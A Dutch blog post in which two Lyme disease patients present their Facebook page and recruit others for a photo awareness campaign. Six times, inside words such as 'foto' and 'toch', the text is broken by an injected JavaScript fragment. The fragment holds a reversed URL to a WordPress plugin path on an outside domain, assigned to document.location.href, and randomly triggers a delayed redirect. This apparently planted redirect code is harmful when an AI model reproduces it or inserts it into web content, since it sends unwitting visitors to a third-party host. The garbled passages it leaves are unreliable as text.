Informatief Lyme Awareness Overig

Lyme dat blijft plakken – Fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocampagne voor Awareness

Verona & Lisa hebben allebei de ziekte van Lyme. Samen hebben zij de Facebookpagina Lyme dat blijft plakken en zijn ze een fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocampagne gestart om meer aandacht te vragen voor de ziekte van Lyme. Zij zoeken hiervoor nog meer Lyme patiënten die hieraan zouden willen meewerken. In onderstaand bericht stellen zij zich voor en vertellen zij hier meer over.

Lyme dat blijft plakken

Lyme dat blijft plakken – Verona & Lisa stellen zich voor

Hallo allemaal,

Wij zullen ons allereerst even voorstellen: wij zijn Lisa (35) en Verona (22) jaar. Wij kennen elkaar via de fysiotherapeut en naast dat wij het goed met elkaar kunnen vinden, hebben we één ding gemeen: allebei hebben we de ziekte van Lyme. Sinds mei 2016 zijn wij met een Facebookpagina gestart, namelijk: Lyme dat blijft plakken. Met deze pagina willen we meer aandacht vragen voor onderzoek, omdat in Nederland de kennis omtrent de ziekte van Lyme helaas nog onvoldoende is! Daarnaast is deze pagina ook bedoeld om ervaring te delen, informatie te verspreiden en mensen wakker te schudden.

Meer aandacht voor Lyme

Ook voor ons is deze ziekte een beperking in ons leven. Vaak geldt toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch het gezegde: ‘Wat men niet ziet, bestaat niet’. Ondanks dat laten we ons niet uit het veld slaan en willen we alles uit het leven halen wat erin zit. Dit doen wij door te kijken naar onze mogelijkheden in plaats van naar onze beperkingen. Ook wij lopen van het kastje naar de muur als het gaat om medische onderzoeken/behandelingen en vergoedingen. Hierdoor weten wij ook dat het voor vele mensen lastig is om de positiviteit in het leven vast te houden. Vanuit onze kracht willen wij meer aandacht vragen voor de vaak vele en nare gevolgen die deze ziekte met zich mee kan brengen. Inmiddels hebben we al allerlei dingen ondernomen: zo hebben we flyers verspreid in Almelo en daarnaast zijn we sinds kort een fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocampagne gestart om meer aandacht te vragen voor Lymepatiënten. Bij RTV Oost hebben wij een toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toelichting mogen geven over deze campagne en zijn deze fotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to’s gepubliceerd (dit gaat om de uitzending van 11-11-2016).

Meld u aan!

Tot op heden zijn wij nog op zoek naar mensen die mee willen doen aan deze campagne, om nog meer aandacht voor deze ziekte te creëren, want dat is wel nodig! Dus: kent u iemand of bent u zelf iemand met de ziekte van Lyme? Meld u dan nu via: lymedatblijftplakken@outlook.com

Wij hopen dat Lyme uiteindelijk echt een gezicht gaat krijgen binnen Nederland!

Facebook reacties

1 Reactie

  • Reply
    Vernimmen Cathy
    24 november 2016 at 18:13
  • Leave a Reply

    Deze site gebruikt Akismet om spam te verminderen. Bekijk hoe je reactie-gegevens worden verwerkt.

    %d bloggers liken dit: